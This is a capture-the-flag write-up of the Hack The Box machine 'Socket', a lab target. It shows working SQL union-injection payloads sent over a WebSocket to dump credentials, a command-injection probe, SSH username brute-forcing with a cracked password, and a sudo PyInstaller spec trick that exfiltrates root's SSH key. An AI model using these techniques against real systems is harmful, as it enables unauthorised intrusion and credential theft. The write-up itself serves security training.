# Socket - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Socket is a nice easy-rated HTB machine created by [kavigihan](https://app.hackthebox.com/users/389926)

It starts with the reversing of a Python 3.10 PyInstaller binary.  
Then, we exploit union injection over WebSocket.  
For root, we modify PyInstaller `spec` file to include `id_rsa` in the bundled binary.

## Initial recon

```console
opcode@parrot$ nmap -v -p- 10.10.11.206
Nmap scan report for 10.10.11.206
Host is up (0.16s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
5789/tcp open  unknown
```

```console
opcode@parrot$ nmap -sC -sV -p 22,80 -oN stocker.nmap 10.10.11.206
Nmap scan report for 10.10.11.206
Host is up (0.15s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4f:e3:a6:67:a2:27:f9:11:8d:c3:0e:d7:73:a0:2c:28 (ECDSA)
|_  256 81:6e:78:76:6b:8a:ea:7d:1b:ab:d4:36:b7:f8:ec:c4 (ED25519)
80/tcp   open  http    Apache httpd 2.4.52
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
| http-server-header: 
|   Apache/2.4.52 (Ubuntu)
|_  Werkzeug/2.1.2 Python/3.10.6
5789/tcp open  unknown
| fingerprint-strings: 
|   GenericLines, GetRequest: 
|     HTTP/1.1 400 Bad Request
|     Date: Sat, 25 Mar 2023 19:17:12 GMT
|     Server: Python/3.10 websockets/10.4
|     Content-Length: 77
|     Content-Type: text/plain
|     Connection: close
|     Failed to open a WebSocket connection: did not receive a valid HTTP request.
|   HTTPOptions, RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Date: Sat, 25 Mar 2023 19:17:13 GMT
|     Server: Python/3.10 websockets/10.4
|     Content-Length: 77
|     Content-Type: text/plain
|     Connection: close
|     Failed to open a WebSocket connection: did not receive a valid HTTP request.
|   Help, SSLSessionReq: 
|     HTTP/1.1 400 Bad Request
|     Date: Sat, 25 Mar 2023 19:17:29 GMT
|     Server: Python/3.10 websockets/10.4
|     Content-Length: 77
|     Content-Type: text/plain
|     Connection: close
|_    Failed to open a WebSocket connection: did not receive a valid HTTP request.
```

The port 5789 is present besides the usual SSH (22) and HTTP (80) ports.  

The website on port 80 redirects us to <http://qreader.htb/>  
Hence, we can add this line to `/etc/hosts`:

```text
10.10.11.206 qreader.htb
```

The home page:

![1](images/1.png)

I tried to find subdomains but couldn't find any.  
Instead, enumerating routes with `ffuf` yielded result:

```console
opcode@parrot$ ffuf -c -w ~/cybersec/wordlists/raft-small-words.txt -u http://qreader.htb/FUZZ -mc all -fs 206 2>/dev/null
report                  [Status: 200, Size: 4161, Words: 878, Lines: 197, Duration: 267ms]
api                     [Status: 404, Size: 61, Words: 3, Lines: 2, Duration: 95ms]
.                       [Status: 200, Size: 6992, Words: 1954, Lines: 228, Duration: 144ms]
embed                   [Status: 405, Size: 153, Words: 16, Lines: 6, Duration: 101ms]
reader                  [Status: 405, Size: 153, Words: 16, Lines: 6, Duration: 756ms]
server-status           [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 174ms]
api-doc                 [Status: 404, Size: 61, Words: 3, Lines: 2, Duration: 133ms]
apis                    [Status: 404, Size: 61, Words: 3, Lines: 2, Duration: 153ms]
api_test                [Status: 404, Size: 61, Words: 3, Lines: 2, Duration: 121ms]
api2                    [Status: 404, Size: 61, Words: 3, Lines: 2, Duration: 136ms]
api3                    [Status: 404, Size: 61, Words: 3, Lines: 2, Duration: 136ms]
api4                    [Status: 404, Size: 61, Words: 3, Lines: 2, Duration: 97ms]
apichain                [Status: 404, Size: 61, Words: 3, Lines: 2, Duration: 106ms]
```

It means the 404 response from `/api` differs from the 404 response on other routes.  
But `/api` is just a time sink. I found things there, but they were not relevant.

The website is built with Flask and can generate and decode QR codes.  
I tried SSTI payloads, but they didn't work.  
I also tried XSS payloads on `/report`, but they didn't work either.

Also, port 5789 is for WebSocket:

```console
opcode@parrot$ curl http://qreader.htb:5789         
Failed to open a WebSocket connection: empty Connection header.

You cannot access a WebSocket server directly with a browser. You need a WebSocket client.
```

## Reversing PyInstaller binary

We also have a couple of downloads on the website: one for Linux and the other for Windows.  
I think they both served the same purpose, but I'm not sure (I didn't download the Windows one)

Running `strings` on the Linux binary, we can see pyQt and other Python-related strings.  
It is likely a PyInstaller binary. Therefore we can use <https://github.com/extremecoders-re/pyinstxtractor>

```console
opcode@parrot$ python3 pyinstxtractor.py qreader
[+] Processing qreader
[+] Pyinstaller version: 2.1+
[+] Python version: 3.10
[+] Length of package: 108535118 bytes
[+] Found 305 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: pyi_rth_subprocess.pyc
[+] Possible entry point: pyi_rth_inspect.pyc
[+] Possible entry point: pyi_rth_pkgutil.pyc
[+] Possible entry point: pyi_rth_multiprocessing.pyc
[+] Possible entry point: pyi_rth_pyqt5.pyc
[+] Possible entry point: pyi_rth_setuptools.pyc
[+] Possible entry point: pyi_rth_pkgres.pyc
[+] Possible entry point: qreader.pyc
[!] Warning: This script is running in a different Python version than the one used to build the executable.
[!] Please run this script in Python 3.10 to prevent extraction errors during unmarshalling
[!] Skipping pyz extraction
[+] Successfully extracted pyinstaller archive: qreader
```

We need to match with Python 3.10 to get ideal results.  
A docker container can be used:

```console
opcode@parrot$ docker run -it --entrypoint=/bin/sh --name python310 python:3.10.0-alpine
/ # cd /home/
/home # wget https://raw.githubusercontent.com/extremecoders-re/pyinstxtractor/master/pyinstxtractor.py
```

We also need to transfer the binary to the container:

```console
opcode@parrot$ docker cp ~/Downloads/app/qreader python310:/home/qreader
```

We can run `pyinstxtractor.py` again:

```console
/home # python3 pyinstxtractor.py qreader
[+] Processing qreader
[+] Pyinstaller version: 2.1+
[+] Python version: 3.10
[+] Length of package: 108535118 bytes
[+] Found 305 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: pyi_rth_subprocess.pyc
[+] Possible entry point: pyi_rth_inspect.pyc
[+] Possible entry point: pyi_rth_pkgutil.pyc
[+] Possible entry point: pyi_rth_multiprocessing.pyc
[+] Possible entry point: pyi_rth_pyqt5.pyc
[+] Possible entry point: pyi_rth_setuptools.pyc
[+] Possible entry point: pyi_rth_pkgres.pyc
[+] Possible entry point: qreader.pyc
[+] Found 637 files in PYZ archive
[+] Successfully extracted pyinstaller archive: qreader

You can now use a python decompiler on the pyc files within the extracted directory
```

`qreader.pyc` can be fed to [decompyle3](https://github.com/rocky/python-decompile3/tree/master) to get back python source code.

```console
/home # python3 -m pip install decompyle3
/home # decompyle3 qreader_extracted/qreader.pyc 
# decompyle3 version 3.9.0
# Python bytecode version base 3.10.0 (3439)
# Decompiled from: Python 3.10.0 (default, Nov 30 2021, 03:19:57) [GCC 10.3.1 20211027]
# Embedded file name: qreader.py

Unsupported Python version, 3.10.0, for decompilation

# Unsupported bytecode in file qreader_extracted/qreader.pyc
# Unsupported Python version, 3.10.0, for decompilation
```

Turns out, decompilation only up to Python 3.8 is supported with Rocky's tools.  
For 3.10, we can use [pycdc](https://github.com/zrax/pycdc)

```console
opcode@parrot$ sudo apt install cmake
opcode@parrot$ git clone https://github.com/zrax/pycdc
opcode@parrot$ cd pycdc
opcode@parrot$ cmake .
opcode@parrot$ make
opcode@parrot$ make check
```

Now, we can run it:

```console
opcode@parrot$ ./pycdc ~/qreader_extracted/qreader.pyc
```

The source code:

```py
# Source Generated with Decompyle++
# File: qreader.pyc (Python 3.10)

import cv2
import sys
import qrcode
import tempfile
import random
import os
from PyQt5.QtWidgets import *
from PyQt5 import uic, QtGui
import asyncio
import websockets
import json
VERSION = '0.0.2'
ws_host = 'ws://ws.qreader.htb:5789'
icon_path = './icon.png'

def setup_env():
Unsupported opcode: WITH_EXCEPT_START
    global tmp_file_name
    pass
# WARNING: Decompyle incomplete


class MyGUI(QMainWindow):
    
    def __init__(self = None):
        super(MyGUI, self).__init__()
        uic.loadUi(tmp_file_name, self)
        self.show()
        self.current_file = ''
        self.actionImport.triggered.connect(self.load_image)
        self.actionSave.triggered.connect(self.save_image)
        self.actionQuit.triggered.connect(self.quit_reader)
        self.actionVersion.triggered.connect(self.version)
        self.actionUpdate.triggered.connect(self.update)
        self.pushButton.clicked.connect(self.read_code)
        self.pushButton_2.clicked.connect(self.generate_code)
        self.initUI()

    
    def initUI(self):
        self.setWindowIcon(QtGui.QIcon(icon_path))

    
    def load_image(self):
        options = QFileDialog.Options()
        (filename, _) = QFileDialog.getOpenFileName(self, 'Open File', '', 'All Files (*)')
        if filename != '':
            self.current_file = filename
            pixmap = QtGui.QPixmap(self.current_file)
            pixmap = pixmap.scaled(300, 300)
            self.label.setScaledContents(True)
            self.label.setPixmap(pixmap)
            return None

    
    def save_image(self):
        options = QFileDialog.Options()
        (filename, _) = QFileDialog.getSaveFileName(self, 'Save File', '', 'PNG (*.png)', options, **('options',))
        if filename != '':
            img = self.label.pixmap()
            img.save(filename, 'PNG')
            return None

    
    def read_code(self):
        if self.current_file != '':
            img = cv2.imread(self.current_file)
            detector = cv2.QRCodeDetector()
            (data, bbox, straight_qrcode) = detector.detectAndDecode(img)
            self.textEdit.setText(data)
            return None
        None.statusBar().showMessage('[ERROR] No image is imported!')

    
    def generate_code(self):
        qr = qrcode.QRCode(1, qrcode.constants.ERROR_CORRECT_L, 20, 2, **('version', 'error_correction', 'box_size', 'border'))
        qr.add_data(self.textEdit.toPlainText())
        qr.make(True, **('fit',))
        img = qr.make_image('black', 'white', **('fill_color', 'back_color'))
        img.save('current.png')
        pixmap = QtGui.QPixmap('current.png')
        pixmap = pixmap.scaled(300, 300)
        self.label.setScaledContents(True)
        self.label.setPixmap(pixmap)

    
    def quit_reader(self):
        if os.path.exists(tmp_file_name):
            os.remove(tmp_file_name)
        sys.exit()

    
    def version(self):
        response = asyncio.run(ws_connect(ws_host + '/version', json.dumps({
            'version': VERSION })))
        data = json.loads(response)
        if 'error' not in data.keys():
            version_info = data['message']
            msg = f'''[INFO] You have version {version_info['version']} which was released on {version_info['released_date']}'''
            self.statusBar().showMessage(msg)
            return None
        error = None['error']
        self.statusBar().showMessage(error)

    
    def update(self):
        response = asyncio.run(ws_connect(ws_host + '/update', json.dumps({
            'version': VERSION })))
        data = json.loads(response)
        if 'error' not in data.keys():
            msg = '[INFO] ' + data['message']
            self.statusBar().showMessage(msg)
            return None
        error = None['error']
        self.statusBar().showMessage(error)

    __classcell__ = None


async def ws_connect(url, msg):
Unsupported opcode: GEN_START
    pass
# WARNING: Decompyle incomplete


def main():
    (status, e) = setup_env()
    if not status:
        print('[-] Problem occured while setting up the env!')
    app = QApplication([])
    window = MyGUI()
    app.exec_()

if __name__ == '__main__':
    main()
    return None
```

There's a lot of code, but only the WebSocket part is relevant.

## Interacting with WebSocket

```py
def version(self):
    response = asyncio.run(ws_connect(ws_host + '/version', json.dumps({
        'version': VERSION })))
    data = json.loads(response)
    if 'error' not in data.keys():
        version_info = data['message']
        msg = f'''[INFO] You have version {version_info['version']} which was released on {version_info['released_date']}'''
        self.statusBar().showMessage(msg)
        return None
    error = None['error']
    self.statusBar().showMessage(error)


def update(self):
    response = asyncio.run(ws_connect(ws_host + '/update', json.dumps({
        'version': VERSION })))
    data = json.loads(response)
    if 'error' not in data.keys():
        msg = '[INFO] ' + data['message']
        self.statusBar().showMessage(msg)
        return None
    error = None['error']
    self.statusBar().showMessage(error)
```

Now, we know how to interact with the WebSocket. For no reason, I prefer JavaScript.  
But first, we need to install the prerequisites:

```
opcode@parrot$ cd /tmp
opcode@parrot$ npm install ws
```

This socket is a bit weird, as it closes the connection after every query.  
I had to modify my script accordingly:

```js
import WebSocket from "ws";
import { createInterface } from "readline";

const rl = createInterface({ input: process.stdin, output: process.stdout });

async function main() {
  const ws = new WebSocket("ws://qreader.htb:5789/version");
  ws.on("open", () => {
    rl.question(">> ", (userInput) => {
      const payload = JSON.stringify({ version: userInput });
      ws.send(payload);
    });
  });

  ws.on("message", (response) => {
    console.log(`${response}`);
    ws.close();
    setTimeout(main, 0);
  });
}

main();
```

Now, we can test for vulnerabilities:

```console
opcode@parrot$ node sock.mjs
>> 0.0.1
{"message": {"id": 1, "version": "0.0.1", "released_date": "12/07/2022", "downloads": 280}}
>> 0.0.2
{"message": {"id": 2, "version": "0.0.2", "released_date": "26/09/2022", "downloads": 720}}
>> 0
{"message": "Invalid version!"}
>> 0.0.1;ping -c 2 10.10.14.40 # 
{"message": "Invalid version!"}
>> 0.0.1' or 1=1-- -
{"message": "Invalid version!"}
>> 0.0.1" or 1=1-- -
{"message": {"id": 2, "version": "0.0.2", "released_date": "26/09/2022", "downloads": 720}}
```

It is vulnerable to SQL injection.

## Union injection

```console
opcode@parrot$ node sock.mjs
>> 0" union select 1,2,3,4-- -
{"message": {"id": 1, "version": 2, "released_date": 3, "downloads": 4}}
```

It is vulnerable to union injection with 4 columns.  
I'd only use 1, and therefore modify the script to show only the version:

```js
import WebSocket from "ws";
import { createInterface } from "readline";

const rl = createInterface({ input: process.stdin, output: process.stdout });

async function main() {
  const ws = new WebSocket("ws://qreader.htb:5789/version");
  ws.on("open", () => {
    rl.question(">> ", (userInput) => {
      const payload = JSON.stringify({ version: userInput });
      ws.send(payload);
    });
  });

  ws.on("message", (response) => {
    console.log(JSON.parse(response).message.version);
    ws.close();
    setTimeout(main, 0);
  });
}

main();
```

```console
opcode@parrot$ node sock.mjs
>> 0" union select 1,2,3,4-- -
2
```

I tried the usual payloads with `information_schema.schemata`, but it did not work.  
It follows that the DMBS is not MySQL.  
We can try and figure it out:

```console
opcode@parrot$ node sock.mjs
>> 0" union select 1,@@version,3,4-- -
>> 0" union select 1,version(),3,4 -- -
```

They both hung up.

```console
opcode@parrot$ node sock.mjs
>> 0" union select 1,sqlite_version(),3,4 -- -
3.37.2
```

Therefore, the database is SQLite.  
We can enumerate the tables:

```console
opcode@parrot$ >> 0" union select 1,group_concat(tbl_name),3,4 FROM sqlite_master WHERE type='table'--
sqlite_sequence,versions,users,info,reports,answers
```

For columns, we can simply dump the schema:

```console
opcode@parrot$ node sock.mjs
>> 0" union select 1,sql,3,4 FROM sqlite_master WHERE tbl_name='sqlite_sequence'--
CREATE TABLE sqlite_sequence(name,seq)
>> 0" union select 1,sql,3,4 FROM sqlite_master WHERE tbl_name='versions'--
CREATE TABLE versions (id INTEGER PRIMARY KEY AUTOINCREMENT, version TEXT, released_date DATE, downloads INTEGER)
>> 0" union select 1,sql,3,4 FROM sqlite_master WHERE tbl_name='users'--
CREATE TABLE users (id INTEGER PRIMARY KEY AUTOINCREMENT, username TEXT, password DATE, role TEXT)
>> 0" union select 1,sql,3,4 FROM sqlite_master WHERE tbl_name='info'--
CREATE TABLE info (id INTEGER PRIMARY KEY AUTOINCREMENT, key TEXT, value TEXT)
>> 0" union select 1,sql,3,4 FROM sqlite_master WHERE tbl_name='reports'--
CREATE TABLE reports (id INTEGER PRIMARY KEY AUTOINCREMENT, reporter_name TEXT, subject TEXT, description TEXT, reported_date DATE)
>> 0" union select 1,sql,3,4 FROM sqlite_master WHERE tbl_name='answers'--
CREATE TABLE answers (id INTEGER PRIMARY KEY AUTOINCREMENT, answered_by TEXT,  answer TEXT , answered_date DATE, status TEXT,FOREIGN KEY(id) REFERENCES reports(report_id))
```

I enumerated them all, but only the `users` and `answers` are useful:

```console
opcode@parrot$ node sock.mjs
>> 0" union select 1,group_concat(id||":"||username||":"||password||":"||role),3,4 FROM users--
1:admin:0c090c365fa0559b151a43e0fea39710:admin
>> 0" union select 1,group_concat(id||":"||answered_by||":"||answer||":"||answered_date||":"||status),3,4 FROM answers--
1:admin:Hello Json,

As if now we support PNG formart only. We will be adding JPEG/SVG file formats in our next version.

Thomas Keller:17/08/2022:PENDING,2:admin:Hello Mike,

 We have confirmed a valid problem with handling non-ascii charaters. So we suggest you to stick with ascci printable characters for now!

Thomas Keller:25/09/2022:PENDING
```

The hash easily cracks on <https://crackstation.net/> to:

```text
denjanjade122566
```

I spent some time on the API..., but it was just a rabbit hole.

## Username brute-force

For the next step, we were expected to guess the admin's username from the message: `tkeller`. I was stuck and had to ask for help on this step.  
After reading `0xdf`'s write-up, I learnt that the intended approach was to use [username-anarchy](https://github.com/urbanadventurer/username-anarchy) and [CrackMapExec](https://github.com/Porchetta-Industries/CrackMapExec) to brute force the possible usernames.

First, we can generate a list of potential usernames:

```console
opcode@parrot$ git clone https://github.com/urbanadventurer/username-anarchy.git
opcode@parrot$ cd username-anarchy
opcode@parrot$ ./username-anarchy Thomas Keller > ~/users.txt
```

Now, we can validate them with CrackMapExec:

```console
opcode@parrot$ docker run -it --entrypoint=/bin/bash --rm --name cmexec cme:latest
```

We also need to transfer the file:

```console
opcode@parrot$ docker cp ~/users.txt cmexec:/root/users.txt
```

Finally, we can run `cme`:

```console
root@93e08180cd4c:~# cme ssh 10.10.11.206 -u ~/users.txt -p denjanjade122566
SSH         10.10.11.206    22     10.10.11.206     [*] SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1
SSH         10.10.11.206    22     10.10.11.206     [-] thomas:denjanjade122566 Authentication failed.
SSH         10.10.11.206    22     10.10.11.206     [-] thomaskeller:denjanjade122566 Authentication failed.
SSH         10.10.11.206    22     10.10.11.206     [-] thomas.keller:denjanjade122566 Authentication failed.
SSH         10.10.11.206    22     10.10.11.206     [-] thomaske:denjanjade122566 Authentication failed.
SSH         10.10.11.206    22     10.10.11.206     [-] thomkell:denjanjade122566 Authentication failed.
SSH         10.10.11.206    22     10.10.11.206     [-] thomask:denjanjade122566 Authentication failed.
SSH         10.10.11.206    22     10.10.11.206     [-] t.keller:denjanjade122566 Authentication failed.
SSH         10.10.11.206    22     10.10.11.206     [+] tkeller:denjanjade122566
```

We can use these credentials to SSH to the box:

```console
opcode@parrot$ sshpass -p 'denjanjade122566' ssh -o StrictHostKeyChecking=no tkeller@qreader.htb
```

## Modifying PyInstaller spec file to include files

```console
tkeller@socket:~$ sudo -l
Matching Defaults entries for tkeller on socket:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User tkeller may run the following commands on socket:
    (ALL : ALL) NOPASSWD: /usr/local/sbin/build-installer.sh
```

We can run `build-installer.sh` as root.  
It is a bash script that allows us to use PyInstaller to build and bundle Python scripts.

```bash
#!/bin/bash
if [ $# -ne 2 ] && [[ $1 != 'cleanup' ]]; then
  /usr/bin/echo "No enough arguments supplied"
  exit 1;
fi

action=$1
name=$2
ext=$(/usr/bin/echo $2 |/usr/bin/awk -F'.' '{ print $(NF) }')

if [[ -L $name ]];then
  /usr/bin/echo 'Symlinks are not allowed'
  exit 1;
fi

if [[ $action == 'build' ]]; then
  if [[ $ext == 'spec' ]] ; then
    /usr/bin/rm -r /opt/shared/build /opt/shared/dist 2>/dev/null
    /home/svc/.local/bin/pyinstaller $name
    /usr/bin/mv ./dist ./build /opt/shared
  else
    echo "Invalid file format"
    exit 1;
  fi
elif [[ $action == 'make' ]]; then
  if [[ $ext == 'py' ]] ; then
    /usr/bin/rm -r /opt/shared/build /opt/shared/dist 2>/dev/null
    /root/.local/bin/pyinstaller -F --name "qreader" $name --specpath /tmp
   /usr/bin/mv ./dist ./build /opt/shared
  else
    echo "Invalid file format"
    exit 1;
  fi
elif [[ $action == 'cleanup' ]]; then
  /usr/bin/rm -r ./build ./dist 2>/dev/null
  /usr/bin/rm -r /opt/shared/build /opt/shared/dist 2>/dev/null
  /usr/bin/rm /tmp/qreader* 2>/dev/null
else
  /usr/bin/echo 'Invalid action'
  exit 1;
fi
```

I wrote a hello world program and tried playing with this bash script.  
Out of those three options, `build` is more interesting. It works on `spec` files.  
The `make` option works on `py` files, creating a `spec` in `/tmp` and the binary in `/opt/shared/dist/`.

In the documentation for `spec` files (<https://pyinstaller.org/en/stable/spec-files.html>), I learnt that we could add data files to be bundled with the binary.

Therefore, we can copy the `spec` file from `/tmp` to `~` and modify it to add data files.  
Therefore, we can grab the root flag. We can also attempt to get root's `id_rsa`:

```py
a = Analysis(
    ['/home/tkeller/hello.py'],
    pathex=[],
    binaries=[],
    datas=[ ('/root/.ssh/id_rsa', '.') ],
    hiddenimports=[],
    hookspath=[],
    hooksconfig={},
    runtime_hooks=[],
    excludes=[],
    win_no_prefer_redirects=False,
    win_private_assemblies=False,
    cipher=block_cipher,
    noarchive=False,
)
```

I had to modify the path and `datas` in this one.

Now, we can build:

```console
tkeller@socket:~$ sudo /usr/local/sbin/build-installer.sh build qreader.spec 
```

```console
opcode@parrot$ sshpass -p 'denjanjade122566' scp tkeller@qreader.htb:/opt/shared/dist/qreader qreader
```

We can use `pyinstxtractor.py` again:

```console
opcode@parrot$ python3 pyinstxtractor.py qreader
[+] Processing qreader
[+] Pyinstaller version: 2.1+
[+] Python version: 3.10
[+] Length of package: 6462256 bytes
[+] Found 35 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: pyi_rth_inspect.pyc
[+] Possible entry point: pyi_rth_subprocess.pyc
[+] Possible entry point: hello.pyc
[!] Warning: This script is running in a different Python version than the one used to build the executable.
[!] Please run this script in Python 3.10 to prevent extraction errors during unmarshalling
[!] Skipping pyz extraction
[+] Successfully extracted pyinstaller archive: qreader

You can now use a python decompiler on the pyc files within the extracted directory
```

If we take a peek inside the extracted files, we will find the `id_rsa`:

```console
opcode@parrot$ ls qreader_extracted    
base_library.zip  libbz2.so.1.0   libexpat.so.1  libpython3.10.so.1.0  pyiboot01_bootstrap.pyc  pyimod03_ctypes.pyc     PYZ-00.pyz
hello.pyc         libcrypto.so.3  liblzma.so.5   libssl.so.3           pyimod01_archive.pyc     pyi_rth_inspect.pyc     PYZ-00.pyz_extracted
id_rsa            lib-dynload     libmpdec.so.3  libz.so.1             pyimod02_importers.pyc   pyi_rth_subprocess.pyc  struct.pyc
```

We can use it to SSH as root:

```console
opcode@parrot$ chmod 600 id_rsa
opcode@parrot$ ssh -i id_rsa root@qreader.htb
```
